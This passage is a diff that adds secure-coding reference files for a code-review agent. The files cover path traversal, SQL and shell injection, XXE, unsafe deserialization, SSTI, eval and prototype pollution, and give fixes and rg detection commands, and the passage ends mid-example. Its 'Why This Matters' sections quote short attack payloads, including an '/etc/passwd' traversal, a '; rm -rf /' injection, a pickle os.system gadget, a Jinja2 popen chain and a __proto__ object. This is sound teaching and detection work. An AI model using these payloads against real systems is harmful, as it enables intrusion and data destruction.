+When serving files based on user-supplied names or paths, resolve the full path and verify it stays within the intended base directory. Use `Path.resolve()` or `os.path.realpath()` and confirm the result starts with the base directory.
+
+### Correct Pattern
+
+**Python:**
+```python
+from pathlib import Path
+from flask import abort, send_file
+
+def serve_export(name: str):
+    base = Path("/var/app/exports").resolve()
+    target = (base / name).resolve()
+
+    # Verify the resolved path is still inside the base directory
+    if not target.is_relative_to(base):
+        abort(403)
+
+    return send_file(target)
+```
+
+**TypeScript:**
+```ts
+import path from 'path';
+
+function serveFile(name: string, res: Response) {
+  const base = path.resolve('/var/app/exports');
+  const target = path.resolve(base, name);
+
+  // Verify containment after resolving symlinks and ../
+  if (!target.startsWith(base + path.sep)) {
+    return res.sendStatus(403);
+  }
+
+  res.sendFile(target);
+}
+```
+
+**Go:**
+```go
+func serveExport(w http.ResponseWriter, r *http.Request) {
+    base := "/var/app/exports"
+    name := filepath.Base(r.URL.Query().Get("name")) // Strip directory components
+    target := filepath.Join(base, name)
+
+    // filepath.Base already strips ../ but verify containment
+    clean, err := filepath.EvalSymlinks(target)
+    if err != nil || !strings.HasPrefix(clean, base) {
+        http.Error(w, "forbidden", http.StatusForbidden)
+        return
+    }
+
+    http.ServeFile(w, r, clean)
+}
+```
+
+**Archive extraction (Python):**
+```python
+import tarfile
+
+def safe_extract(archive_path: str, dest: str):
+    with tarfile.open(archive_path) as tar:
+        # Python 3.12+: filter="data" blocks path traversal and special files
+        tar.extractall(path=dest, filter="data")
+```
+
+### Why This Matters
+
+Path traversal allows reading arbitrary files from the server filesystem. `../../../etc/passwd` is the classic payload, but the real targets are configuration files with credentials, application source code, and database files. Archive extraction (tar, zip) compounds the risk — a malicious archive can write files outside the extraction directory (zip-slip).
+
+**CVEs:** CVE-2007-4559 (Python tarfile — extractall without path validation, 15+ years unpatched), CVE-2022-48285 (jszip path traversal), CVE-2023-26111 (node-static path traversal).
+
+### Detection
+
+```bash
+# Python: os.path.join or Path with user input, without containment check
+rg -n 'os\.path\.join\(|Path\(' --type py | rg -v 'resolve\(\)|realpath'
+
+# Python: tarfile.extractall without filter (pre-3.12 pattern)
+rg -n 'extractall\(' --type py | rg -v 'filter='
+
+# TypeScript: sendFile or readFile with user path
+rg -n 'sendFile\(|readFile\(|readFileSync\(' --type ts
+
+# Python: open() with user-supplied path
+rg -n 'open\(.*request\.|open\(.*user_' --type py
+```
+
+---
+
+## Use Parameterized Queries for All Database Access
+
+Pass user values as parameters, never as interpolated strings. Every ORM and database driver supports parameterized queries — use them. When the ORM cannot express a query, use the driver's parameter binding, not string formatting.
+
+### Correct Pattern
+
+**Python (Django):**
+```python
+# ORM query — parameterized by default
+invoices = Invoice.objects.filter(customer_id=request.GET["cid"])
+
+# When raw SQL is unavoidable, use parameter binding
+Invoice.objects.extra(
+    where=["customer_id = %s"],
+    params=[request.GET["cid"]]
+)
+
+# Or use RawSQL with params
+from django.db.models.expressions import RawSQL
+Invoice.objects.annotate(
+    val=RawSQL("SELECT balance FROM accounts WHERE id = %s", [account_id])
+)
+```
+
+**TypeScript (Prisma):**
+```ts
+// Tagged template — automatically parameterized
+const users = await prisma.$queryRaw`
+  SELECT * FROM users WHERE name = ${name}
+`;
+
+// NEVER use $queryRawUnsafe with user input
+// await prisma.$queryRawUnsafe(`SELECT * FROM users WHERE name = '${name}'`);  // SQL injection
+```
+
+**Go:**
+```go
+// Use query parameters — ? or $1 depending on driver
+row := db.QueryRowContext(ctx,
+    "SELECT * FROM orders WHERE id = $1 AND user_id = $2",
+    orderID, userID,
+)
+```
+
+### Why This Matters
+
+SQL injection through string interpolation in queries remains one of the most exploited vulnerability classes. Even ORMs provide escape hatches (`.raw()`, `.extra()`, `$queryRawUnsafe`) that bypass parameterization. When these methods receive f-strings or template literals with user data, the application is vulnerable to data exfiltration, authentication bypass, and in some databases, code execution.
+
+**CVEs:** CVE-2023-25813 (Sequelize `literal()` injection), CVE-2025-23061 (Mongoose `populate({match: userObj})` NoSQL injection).
+
+### Detection
+
+```bash
+# Django: raw SQL with string formatting
+rg -n '\.raw\(f"|\.extra\(where=\[f"|cursor\.execute\(f"|RawSQL\(f"' --type py
+
+# SQLAlchemy: text() with f-string
+rg -n 'text\(f"|session\.execute\(f"' --type py
+
+# Prisma: $queryRawUnsafe (always review)
+rg -n '\$queryRawUnsafe|\$executeRawUnsafe' --type ts
+
+# Sequelize: literal with user data
+rg -n 'literal\(|sequelize\.query\(' --type ts --type js
+
+# Go: string concatenation in SQL
+rg -n 'fmt\.Sprintf.*SELECT|fmt\.Sprintf.*INSERT|fmt\.Sprintf.*UPDATE' --type go
+```
+
+---
+
+## Disable External Entity Resolution in XML Parsers
+
+Configure XML parsers to reject Document Type Definitions (DTDs) and external entity references before parsing untrusted XML. Use `defusedxml` in Python. In Java, set the four companion feature flags on `DocumentBuilderFactory`.
+
+### Correct Pattern
+
+**Python:**
+```python
+# Use defusedxml — safe defaults for all XML operations
+from defusedxml import ElementTree as ET
+tree = ET.fromstring(request.data)
+
+# Or configure lxml explicitly
+from lxml import etree
+parser = etree.XMLParser(resolve_entities=False, no_network=True)
+tree = etree.fromstring(request.data, parser=parser)
+```
+
+**Java:**
+```java
+DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
+// Disable all external entity processing
+factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
+factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
+DocumentBuilder builder = factory.newDocumentBuilder();
+```
+
+**TypeScript/Node:**
+```ts
+// libxmljs: disable entity resolution
+const doc = libxmljs.parseXml(xmlString, { noent: false, nonet: true });
+```
+
+### Why This Matters
+
+XXE (XML External Entity) attacks use DTD references to read files from the server (`file:///etc/passwd`), make SSRF requests (`http://169.254.169.254/`), or in Java environments, reach deserialization gadgets via JNDI lookups. Python's standard library `xml.etree.ElementTree` resolves entities by default. SAML, OOXML, and SOAP parsers that wrap unsafe XML stages inherit the vulnerability.
+
+**CVEs:** CVE-2024-6508 (lxml entity resolution bypass family).
+
+### Detection
+
+```bash
+# Python: stdlib XML parsers on untrusted input (use defusedxml instead)
+rg -n 'xml\.etree|xml\.sax|xml\.dom\.minidom|xml\.parsers\.expat' --type py
+
+# Python: lxml without safe configuration
+rg -n 'etree\.fromstring\(|etree\.parse\(' --type py | rg -v 'resolve_entities=False'
+
+# Java: DocumentBuilder without entity restrictions
+rg -n 'DocumentBuilderFactory|SAXParserFactory' --type java
+
+# Check for defusedxml usage (safe)
+rg -n 'defusedxml' --type py
+```
+
+---
+
+## Expose Only Required Fields in API Responses
+
+Define explicit field lists or DTOs for every API response. The database row is never the API response — select only the fields the client needs and exclude internal identifiers, password hashes, tokens, and debug information.
+
+### Correct Pattern
+
+**Python (DRF):**
+```python
+class UserPublicSerializer(ModelSerializer):
+    class Meta:
+        model = User
+        # Explicit field list — password_hash, 2fa_secret, internal flags excluded
+        fields = ['id', 'display_name', 'avatar_url']
+```
+
+**Python (FastAPI/Pydantic):**
+```python
+class UserResponse(BaseModel):
+    id: int
+    display_name: str
+    avatar_url: str | None
+
+    class Config:
+        extra = "ignore"  # Silently drop unknown fields from ORM row
+
+@app.get("/users/{user_id}", response_model=UserResponse)
+async def get_user(user_id: int):
+    user = await User.get(id=user_id)
+    return user  # Pydantic response_model filters to declared fields only
+```
+
+**TypeScript (Prisma):**
+```ts
+// Select only the fields needed — never return the raw row
+const user = await prisma.user.findUnique({
+  where: { id },
+  select: { id: true, displayName: true, avatarUrl: true },
+});
+return res.json(user);
+```
+
+**Go:**
+```go
+// Define a response struct separate from the database model
+type UserResponse struct {
+    ID          string `json:"id"`
+    DisplayName string `json:"display_name"`
+    AvatarURL   string `json:"avatar_url,omitempty"`
+}
+```
+
+### Why This Matters
+
+Returning raw database rows leaks internal fields to clients: password hashes, API tokens, internal feature flags, billing details, and fields added by future migrations. Pydantic models with `extra = "allow"` pass through unexpected fields transparently. DRF serializers with `fields = '__all__'` expose every column.
+
+Real incident: Sentry commit `0c0aae90ac1` — Pydantic model with `extra = "allow"` leaked internal `SeerRunState` fields in the API response.
+
+### Detection
+
+```bash
+# DRF: serializers that expose all fields
+rg -n "fields = '__all__'" --type py
+
+# FastAPI: endpoints without response_model (raw ORM row returned)
+rg -n '@app\.(get|post|put|patch)' --type py | rg -v 'response_model='
+
+# Pydantic: models allowing extra fields
+rg -n 'extra = .allow.' --type py
+
+# Prisma/Sequelize: queries without select
+rg -n 'findUnique\(|findFirst\(|findMany\(' --type ts | rg -v 'select:'
+
+# Debug mode in production
+rg -n 'DEBUG = True|debug: true|stackTrace.*true' --type py --type ts --type js
+```
+
+---
+
+## Disable Debug Modes and Verbose Error Responses in Production
+
+Production error responses must return a generic message to the client and log the full stack trace server-side. Framework debug modes (Django `DEBUG=True`, Flask `debug=True`, Express `err.stack` in responses) expose source code, configuration, SQL queries, and internal paths.
+
+### Correct Pattern
+
+**Python (Flask):**
+```python
+@app.errorhandler(500)
+def internal_error(error):
+    # Log full details server-side
+    app.logger.error("Internal error", exc_info=error)
+    # Return generic message to client
+    return {"error": "internal server error"}, 500
+```
+
+**TypeScript (Express):**
+```ts
+app.use((err: Error, req: Request, res: Response, next: NextFunction) => {
+  // Log full stack server-side
+  console.error(err.stack);
+  // Generic response to client — no stack trace, no SQL, no paths
+  res.status(500).json({ error: 'internal server error' });
+});
+```
+
+### Why This Matters
+
+Debug error pages reveal the application's internal structure: file paths, database queries, configuration values, environment variables, and sometimes credentials. Django's debug page shows the full settings dictionary. Flask's Werkzeug debugger provides an interactive Python console. Express's default error handler includes `err.stack` which contains file paths and line numbers.
+
+### Detection
+
+```bash
+# Django/Flask debug mode
+rg -n 'DEBUG = True|debug=True|app\.debug' --type py
+
+# Express: error stack in response
+rg -n 'err\.stack|error\.stack|traceback' --type ts --type js
+
+# Python: traceback in response body
+rg -n 'traceback\.format_exc\(\)|traceback\.print_exc\(\)' --type py
+```

--- a/agents/reviewer-system/references/security-finding-template.md
+++ b/agents/reviewer-system/references/security-finding-template.md
@@ -1,0 +1,69 @@
+# Security Finding Template
+
+Every security finding must fill ALL fields below. If you cannot fill the "Exploitation Path" with concrete variable names and file references, the finding does not qualify. Drop it or report it as an observation, not a finding.
+
+## Finding Structure
+
+```
+### [SEVERITY] [N]: [Title — states the vulnerability, not the fix]
+
+- **File**: `path/to/file.ext:line`
+- **Vulnerability Class**: [One of: Authorization, Injection, Data Exfiltration, CI/CD, PII Exposure]
+- **Exploitation Path**: [source] → [intermediate steps with variable names] → [sink]
+  Example: `request.query.id` → `OrderController.get()` → `db.order.findUnique({ where: { id } })` — no ownership filter
+- **Severity**: [CRITICAL | HIGH | MEDIUM | LOW]
+  Evidence: [Why this severity — blast radius, auth requirement, data sensitivity]
+  When uncertain, pick the lower severity and state why.
+- **Verified**: `rg -n 'pattern' path/to/file.ext` → [output excerpt proving the finding]
+- **Correct Pattern**:
+  ```language
+  // The fix, with explanatory comments
+  ```
+```
+
+## Severity Criteria
+
+| Level | Criteria | Example |
+|-------|----------|---------|
+| CRITICAL | Unauthenticated access to sensitive data or code execution | Unauthenticated SSRF to cloud metadata, unauthenticated RCE via deserialization |
+| HIGH | Authenticated but cross-tenant/cross-user access, or authenticated code execution | IDOR exposing other users' data, authenticated command injection |
+| MEDIUM | Requires specific preconditions or produces bounded impact | Fail-open permission check needing unknown role string, path traversal bounded by directory |
+| LOW | Defense-in-depth gap where primary control holds | Missing secondary authorization layer, verbose error in internal service |
+
+## Qualification Gate
+
+A finding qualifies only when all three conditions are true:
+
+1. **The source is attacker-reachable.** Values from request body, query, headers, URL path, uploaded files, webhook payloads, PR titles, comment bodies, or user-controlled database fields. Hardcoded constants and server-derived values do not qualify.
+
+2. **The sink produces impact.** The data reaches a code-execution API, crosses a trust boundary, exposes non-public information, or bypasses an authorization decision.
+
+3. **The path is traceable.** You followed the data from source through every intermediate function, middleware, and validation layer to the sink. Pattern-matching a function name is not tracing.
+
+## Verification Commands
+
+Every finding must include a verification command that another reviewer can run to confirm the issue exists. Examples:
+
+```bash
+# Find unscoped ORM lookups in Django views
+rg -n 'objects\.(get|filter)\(id=' --type py
+
+# Find shell=True subprocess calls
+rg -n 'shell=True' --type py
+
+# Find raw SQL with string interpolation
+rg -n '\$queryRawUnsafe|\.raw\(f"|\.extra\(where=\[f"' --type py
+
+# Find user-controlled URLs passed to fetch/requests
+rg -n 'requests\.get\(|fetch\(|axios\.(get|post)\(' --type py --type ts
+
+# Find pickle.loads on request data
+rg -n 'pickle\.loads|cloudpickle\.loads|joblib\.load' --type py
+
+# Find expression injection in GitHub Actions
+rg -n '\$\{\{.*github\.event\.' .github/workflows/
+```
+
+## Cross-Reference Rule
+
+A single code location that spans multiple vulnerability classes is one finding with multiple class tags, not separate findings. Example: an unscoped ORM query that also leaks PII in the response is one finding tagged `[Authorization, PII Exposure]`.

--- a/agents/reviewer-system/references/security-injection.md
+++ b/agents/reviewer-system/references/security-injection.md
@@ -1,0 +1,296 @@
+# Injection and Code Execution Patterns
+
+Load when reviewing code that touches subprocess calls, eval/exec, template rendering, deserialization, or deep-merge of user-controlled objects.
+
+The abstract shape is constant: untrusted input reaches a sink that executes code on the server. The correct approach is to keep user data out of code-execution paths entirely — use safe APIs, parameterized interfaces, and strict input validation.
+
+---
+
+## Pass Arguments as Arrays to Subprocess Calls
+
+Use the array form of subprocess APIs with `shell=False`. This prevents shell metacharacter interpretation and ensures each argument is passed as a discrete value, not parsed by a shell.
+
+### Correct Pattern
+
+**Python:**
+```python
+import subprocess
+
+# Array form — each argument is a separate list element
+# The -- separator prevents user_input from being interpreted as a flag
+subprocess.run(["git", "clone", "--", user_repo_url], check=True)
+
+# For file operations, same principle
+subprocess.run(["convert", user_filename, "out.png"], shell=False, check=True)
+```
+
+**TypeScript/Node:**
+```ts
+import { execFile } from 'node:child_process';
+
+// execFile does not spawn a shell — arguments cannot break out
+execFile('git', ['clone', '--', userRepoUrl], (err, stdout) => {
+  if (err) throw err;
+});
+```
+
+**Go:**
+```go
+// exec.Command passes arguments directly to the binary, no shell involved
+cmd := exec.Command("git", "clone", "--", userRepoURL)
+if err := cmd.Run(); err != nil {
+    return fmt.Errorf("clone failed: %w", err)
+}
+```
+
+### Why This Matters
+
+Shell injection occurs when user input is interpolated into a command string that a shell parses. The shell interprets metacharacters (`; | && $() \`\``) as control flow, turning data into commands. `subprocess.run(f"git clone {url}", shell=True)` lets an attacker supply `; rm -rf /` as the URL.
+
+**CVEs:** CVE-2021-22205 (GitLab ExifTool — unauthenticated RCE via crafted image metadata passed to shell), CVE-2024-27980 (Node.js BatBadBut — `.bat`/`.cmd` targets on Windows implicitly invoke a shell even with `execFile`, fixed in Node 18.20/20.12/21.7).
+
+### Detection
+
+```bash
+# Python: shell=True with potential user input
+rg -n 'shell=True' --type py
+
+# Python: os.system and os.popen (always use a shell)
+rg -n 'os\.system\(|os\.popen\(' --type py
+
+# Node: child_process.exec (always uses a shell)
+rg -n "exec\(|execSync\(" --type ts | rg -v 'execFile'
+
+# Go: exec.Command with shell invocation
+rg -n 'exec\.Command\("sh"|exec\.Command\("bash"|exec\.Command\("/bin/sh"' --type go
+```
+
+---
+
+## Use Safe Loaders for Deserialization
+
+Deserialize data using format-restricted loaders that cannot instantiate arbitrary objects. For YAML, use `safe_load`. For data exchange, use JSON. Never use `pickle`, `marshal`, or `node-serialize` on untrusted input — these are inherently RCE primitives.
+
+### Correct Pattern
+
+**Python (YAML):**
+```python
+import yaml
+
+# SafeLoader restricts to primitive types — no arbitrary object instantiation
+config = yaml.safe_load(request.data)
+
+# Equivalent explicit form
+config = yaml.load(request.data, Loader=yaml.SafeLoader)
+```
+
+**Python (data exchange):**
+```python
+import json
+
+# JSON does not execute code during parsing
+data = json.loads(request.data)
+```
+
+**Python (ML models — when pickle is unavoidable):**
+```python
+# For ML model uploads, enforce format validation before loading
+# Use safetensors, ONNX, or other non-executable formats
+from safetensors import safe_open
+model = safe_open(uploaded_path, framework="pt")
+```
+
+**TypeScript:**
+```ts
+// JSON.parse is safe — no code execution
+const data = JSON.parse(req.body);
+
+// For structured validation, parse through a schema
+import { z } from 'zod';
+const Config = z.object({ name: z.string(), value: z.number() });
+const validated = Config.parse(JSON.parse(req.body));
+```
+
+### Why This Matters
+
+Deserializers that can instantiate arbitrary classes are remote code execution primitives. Python's `pickle.loads` calls `__reduce__` which can return `(os.system, ("rm -rf /",))`. YAML's default loader processes `!!python/object` tags. Node's `node-serialize` calls `eval()` on embedded functions.
+
+**CVEs:** CVE-2020-1747 (PyYAML `FullLoader` allowed RCE gadgets before 5.3.1), CVE-2017-5941 (node-serialize — `eval` on IIFE in serialized data), CVE-2021-44228 (Log4Shell — JNDI lookup triggered by logged strings led to remote class loading and deserialization), CVE-2022-22965 (Spring4Shell — data binding exposed classloader for webshell drop), Picklescan CVE-2025-1716 (poisoned ML model files).
+
+### Detection
+
+```bash
+# Python: unsafe deserialization
+rg -n 'pickle\.loads|cloudpickle\.loads|joblib\.load|dill\.loads|marshal\.loads' --type py
+
+# Python: yaml.load without SafeLoader
+rg -n 'yaml\.load\(' --type py | rg -v 'SafeLoader|safe_load'
+
+# Node: node-serialize (always unsafe)
+rg -n 'node-serialize|\.unserialize\(' --type ts --type js
+
+# Java: ObjectInputStream on network input
+rg -n 'ObjectInputStream|readObject\(\)' --type java
+```
+
+---
+
+## Render Templates from Files, Not from User Input
+
+Template engines must compile templates from trusted file paths, not from user-supplied strings. When the template source is user-controlled, the template engine becomes a code execution sink.
+
+### Correct Pattern
+
+**Python (Flask/Jinja2):**
+```python
+# Template loaded from a file on disk — user data is a context variable, not the template
+@app.route("/preview")
+def preview():
+    return render_template("preview.html", body=request.args["body"])
+```
+
+**Python (Jinja2 direct):**
+```python
+from jinja2 import Environment, FileSystemLoader
+
+# Templates loaded from the filesystem, never from user input
+env = Environment(loader=FileSystemLoader("templates"), autoescape=True)
+tmpl = env.get_template("report.html")
+output = tmpl.render(data=user_data)
+```
+
+**TypeScript (Handlebars):**
+```ts
+import { readFileSync } from 'fs';
+import Handlebars from 'handlebars';
+
+// Template source from disk, not from request
+const tmpl = Handlebars.compile(readFileSync('views/preview.hbs', 'utf8'));
+res.send(tmpl({ user: req.user }));
+```
+
+### Why This Matters
+
+Server-Side Template Injection (SSTI) occurs when user input becomes the template source rather than a template variable. Jinja2's `{{ 7*7 }}` evaluates to `49`, and `{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}` executes commands. Jinja2's `SandboxedEnvironment` has a history of bypasses.
+
+**CVEs:** CVE-2019-10906 (Jinja2 sandbox escape), CVE-2016-10745 (Jinja2 sandbox bypass via `__init_subclass__`), CVE-2019-19919 (Handlebars prototype pollution leading to compile-time RCE via `helperMissing`).
+
+### Detection
+
+```bash
+# Python: render_template_string with user input (SSTI)
+rg -n 'render_template_string\(' --type py
+
+# Python: Jinja2 Template constructed from variable
+rg -n 'Template\(.*request|Template\(.*user|Template\(.*data' --type py
+
+# Node: Handlebars.compile with request data
+rg -n 'Handlebars\.compile\(req\.|\.compile\(req\.body' --type ts --type js
+
+# Node: pug.compile or ejs.render with user input
+rg -n 'pug\.compile\(|ejs\.render\(' --type ts --type js
+```
+
+---
+
+## Evaluate Expressions with Restricted Parsers
+
+When user input must be evaluated as an expression (calculators, formula fields, configuration DSLs), use a restricted parser that handles only the allowed operations. Never pass user strings to `eval`, `exec`, `Function`, or `vm` APIs.
+
+### Correct Pattern
+
+**Python:**
+```python
+import ast
+
+# ast.literal_eval handles only Python literals — no function calls, no imports
+result = ast.literal_eval(request.args["expr"])
+
+# For arithmetic expressions, use a dedicated parser
+from simpleeval import simple_eval
+result = simple_eval(request.args["expr"])  # Only basic math operators
+```
+
+**TypeScript:**
+```ts
+// Use a purpose-built expression evaluator with an operation allowlist
+import { evaluate } from 'mathjs';
+const result = evaluate(userExpr, { scope: {} });
+
+// Or parse the expression yourself
+const ALLOWED_OPS = ['+', '-', '*', '/'];
+const result = safeEvaluator.evaluate(userExpr, { allow: ALLOWED_OPS });
+```
+
+### Why This Matters
+
+`eval` and `Function` execute arbitrary code in the application's context. An attacker supplying `__import__('os').system('id')` to Python's `eval` or `require('child_process').execSync('id')` to JavaScript's `Function` has full code execution. Node's `vm` module is not a security sandbox — `vm2` was abandoned after CVE-2023-37903 proved it unfixable.
+
+**CVEs:** CVE-2025-55182 (Next.js React2Shell — Server Actions exposed eval-equivalent sinks), CVE-2023-37903 (vm2 sandbox escape — project abandoned), CVE-2023-29017 (vm2 earlier escape), CVE-2023-32314 (vm2 another escape).
+
+### Detection
+
+```bash
+# Python: eval/exec with potential user input
+rg -n 'eval\(|exec\(' --type py | rg -v 'ast\.literal_eval|# noqa'
+
+# TypeScript: eval, Function constructor, vm
+rg -n 'eval\(|new Function\(|vm\.run' --type ts --type js
+
+# Python: dynamic import with user input
+rg -n 'importlib\.import_module\(|__import__\(' --type py
+
+# Ruby: eval with user data
+rg -n 'eval\(|instance_eval|class_eval|send\(' --type ruby
+```
+
+---
+
+## Validate Object Shape Before Deep Merge
+
+When merging user-supplied objects into configuration or state, parse through a schema validator first. Deep-merge libraries that recursively copy properties allow prototype pollution — an attacker sends `{"__proto__": {"isAdmin": true}}` and every object in the process inherits the polluted property.
+
+### Correct Pattern
+
+**TypeScript:**
+```ts
+import { z } from 'zod';
+
+// Define the exact shape — __proto__ and constructor cannot pass
+const Config = z.object({
+  theme: z.enum(['light', 'dark']).optional(),
+  locale: z.string().max(5).optional(),
+});
+
+// Parse strips unknown properties, rejects __proto__
+const validated = Config.parse(req.body);
+const merged = { ...defaults, ...validated };
+```
+
+**TypeScript (when merge is unavoidable):**
+```ts
+// Use Object.create(null) as the target — no prototype to pollute
+const config = Object.create(null);
+for (const [key, value] of Object.entries(validated)) {
+  config[key] = value;
+}
+```
+
+### Why This Matters
+
+Prototype pollution modifies `Object.prototype`, affecting every object in the process. When a polluted property reaches a template engine, auth check, or configuration reader, it becomes a code execution or privilege escalation vector. The Handlebars + lodash chain is the canonical example: pollute `helperMissing` via `_.merge({}, defaults, req.body)`, then template compilation invokes the polluted helper.
+
+**CVEs:** CVE-2019-10744 (lodash.merge prototype pollution), CVE-2020-8203 (lodash.zipObjectDeep), CVE-2019-11358 (jQuery.extend deep merge), CVE-2019-19919 (Handlebars helperMissing RCE via prototype pollution), CVE-2026-40175 (axios header injection via prototype pollution enabling IMDS bypass).
+
+### Detection
+
+```bash
+# lodash deep merge with user data
+rg -n '\.merge\(|\.mergeWith\(|\.defaultsDeep\(|\.set\(|\.setWith\(' --type ts --type js
+
+# jQuery extend with deep flag
+rg -n '\$\.extend\(true' --type ts --type js
+
+# Hand-rolled recursive merge (check for __proto__ filtering)
+rg -n 'function.*merge|function.*deepMerge|function.*assign' --type ts --type js
+```

--- a/agents/reviewer-system/references/security-pii.md
+++ b/agents/reviewer-system/references/security-pii.md
@@ -1,0 +1,327 @@
+# PII Exposure Patterns
+
+Load when reviewing code that handles personal data in logs, test fixtures, error responses, serialized output, URLs, telemetry, or git history.
+
+PII exposure occurs when personally identifiable information appears in a context with broader visibility, longer retention, or lower trust than intended. The correct approach is to use synthetic data in tests, structured identifiers (not raw PII) in logs, and explicit field selection in API responses. Every exposure path should be justified by a documented purpose.
+
+---
+
+## Use Synthetic Data in Test Fixtures
+
+Test data, fixtures, snapshots, cassettes, and seed files must use obviously synthetic identifiers. Replace real customer emails, names, account slugs, and business data with RFC-standard examples or clearly fake values. Real data copied from support tickets, CRM exports, or production databases becomes part of permanent git history.
+
+### Correct Pattern
+
+**Python:**
+```python
+# Use RFC 2606 reserved domains — unambiguously synthetic
+fixture = {
+    "email": "user@example.com",
+    "org_slug": "org-slug",
+    "name": "Jane Doe",
+    "ip": "198.51.100.23",       # RFC 5737 documentation range
+    "arr_usd": 120000,            # Round number — obviously synthetic
+    "renewal_date": "2026-01-01",
+}
+```
+
+**TypeScript:**
+```ts
+const fixture = {
+  email: 'user@example.com',
+  orgSlug: 'org-slug',
+  name: 'John Doe',
+  ip: '203.0.113.42',  // RFC 5737 TEST-NET-3
+  monthlySpend: 1000,
+  seatCount: 25,
+};
+```
+
+### Safe Domains and IP Ranges
+
+| Type | Safe Values | Standard |
+|------|-------------|----------|
+| Email domains | `example.com`, `example.org`, `example.net`, `example.edu`, `.invalid` | RFC 2606 |
+| IPv4 addresses | `192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24` | RFC 5737 |
+| IPv6 addresses | `2001:db8::/32` | RFC 3849 |
+| Names | `Jane Doe`, `John Doe`, `Alice`, `Bob`, `Acme Corp` | Convention |
+| Org identifiers | `org-slug`, `example-org`, `demo-customer` | Convention |
+
+### Why This Matters
+
+Real customer data in git history cannot be fully purged. Force-pushing rewrites break collaborators, and the data persists in forks, CI caches, and local clones. A single real email address in a test fixture is a GDPR data subject access request waiting to happen. Real customer revenue, contract values, or account health data in fixtures violates confidentiality obligations even in private repositories.
+
+### Detection
+
+```bash
+# Find email addresses in test files (excluding example.com and common safe patterns)
+rg -n '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' tests/ fixtures/ --type py --type ts | \
+  rg -v 'example\.(com|org|net)|noreply|test@|foo@|user@'
+
+# Find IP addresses in test files (excluding documentation ranges)
+rg -n '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b' tests/ fixtures/ | \
+  rg -v '192\.0\.2\.|198\.51\.100\.|203\.0\.113\.|127\.0\.0\.|0\.0\.0\.0|10\.\|172\.(1[6-9]|2|3[01])\.|192\.168\.'
+
+# Find potential customer data in fixtures
+rg -n 'customer|account.*slug|org.*slug|tenant' tests/ fixtures/ --type py --type ts
+```
+
+---
+
+## Log Structured Identifiers Instead of Raw PII
+
+Log the user's internal ID, a salted hash of their email, or a correlation ID — never the raw email, IP address, phone number, or request body. Operational logs are retained for months or years, shipped to third-party log aggregators, and accessible to broad operations teams.
+
+### Correct Pattern
+
+**Python:**
+```python
+import hashlib
+
+def hash_email(email: str) -> str:
+    """Stable hash for log correlation without exposing the address."""
+    return hashlib.sha256(f"salt:{email}".encode()).hexdigest()[:12]
+
+# Log with internal identifiers only
+logger.warning(
+    "identity lookup failed",
+    extra={"user_id": user.id, "email_hash": hash_email(user.email)},
+)
+```
+
+**TypeScript:**
+```ts
+// Log internal ID and reason, not the raw PII
+logger.warn('signup failed', {
+  userId: user.id,
+  reason: 'validation_failed',
+  // Never: email: req.body.email, ip: req.ip, body: req.body
+});
+```
+
+**Go:**
+```go
+// Structured logging with internal identifiers
+slog.Warn("identity lookup failed",
+    "user_id", user.ID,
+    "error", err,
+    // Never: "email", user.Email, "ip", r.RemoteAddr
+)
+```
+
+### Why This Matters
+
+PII in logs creates a secondary data store that bypasses the application's access controls. Log aggregators (Datadog, Splunk, Elasticsearch) retain data for months, index it for full-text search, and make it available to operations teams who should not have access to individual user data. Logging `request.body` or `request.headers` wholesale captures passwords, tokens, and personal data indiscriminately.
+
+### Detection
+
+```bash
+# Python: logging with email, IP, or request body
+rg -n 'logger\.\w+\(.*email|logger\.\w+\(.*REMOTE_ADDR|logger\.\w+\(.*request\.(body|data|META)' --type py
+
+# TypeScript: logging with PII fields
+rg -n 'logger\.\w+\(.*email|logger\.\w+\(.*req\.(body|ip)|console\.\w+\(.*email' --type ts
+
+# Find Sentry scope setting with PII
+rg -n 'set_user\(|set_tag\(.*email|set_extra\(.*email' --type py
+
+# Find metrics/analytics with PII tags
+rg -n 'metrics\.\w+\(.*email|tags.*email|dimensions.*email' --type py --type ts
+
+# Go: logging with PII
+rg -n 'slog\.\w+\(.*email|log\.\w+\(.*email|zap\.\w+\(.*email' --type go
+```
+
+---
+
+## Keep PII Out of URL Query Strings and Path Segments
+
+Emails, phone numbers, names, and user identifiers in URLs appear in browser history, server access logs, CDN logs, referrer headers, and analytics tools. Use server-side sessions, POST bodies, or opaque tokens to pass identity information between pages.
+
+### Correct Pattern
+
+**Python:**
+```python
+# Store error context in the session, not the URL
+request.session["login_error"] = "invalid_magic_code"
+return redirect("/login/error")
+```
+
+**TypeScript:**
+```ts
+// Use an opaque error code, not the email
+return redirect('/oauth/error?reason=invalid_code');
+```
+
+### Why This Matters
+
+URL query parameters appear in HTTP access logs (which are retained for months), browser history (accessible to anyone with physical access), CDN logs (managed by third parties), and the `Referer` header (sent to every resource loaded on the target page). An email in a redirect URL like `/login/error?email=user@company.com` leaks the address to every downstream system that processes the URL.
+
+### Detection
+
+```bash
+# Find redirects with email-like parameters
+rg -n 'redirect.*email=|redirect.*user=|redirect.*phone=' --type py --type ts
+
+# Find URL construction with PII
+rg -n 'f".*\?.*email|`.*\?.*email|\?.*email=' --type py --type ts
+
+# Find PII in URL path segments
+rg -n 'url.*email|path.*email|route.*email' --type py --type ts
+```
+
+---
+
+## Exclude PII Fields from Serialized API Responses
+
+API serializers and GraphQL resolvers must declare an explicit field list that excludes PII not required by the caller. When an endpoint returns user data, include only the fields the client needs — not the full database row with email, IP, phone, and internal identifiers.
+
+### Correct Pattern
+
+**Python (DRF):**
+```python
+class UserPublicSerializer(ModelSerializer):
+    class Meta:
+        model = User
+        # Only fields the public client needs
+        fields = ['id', 'display_name', 'avatar_url']
+        # Explicitly NOT included: email, phone, ip_address, password_hash
+```
+
+**TypeScript (Prisma):**
+```ts
+// Select only public fields — email and internal data excluded
+const user = await prisma.user.findUnique({
+  where: { id },
+  select: { id: true, displayName: true, avatarUrl: true },
+});
+return res.json(user);
+```
+
+**GraphQL:**
+```graphql
+type UserPublic {
+  id: ID!
+  displayName: String!
+  avatarUrl: String
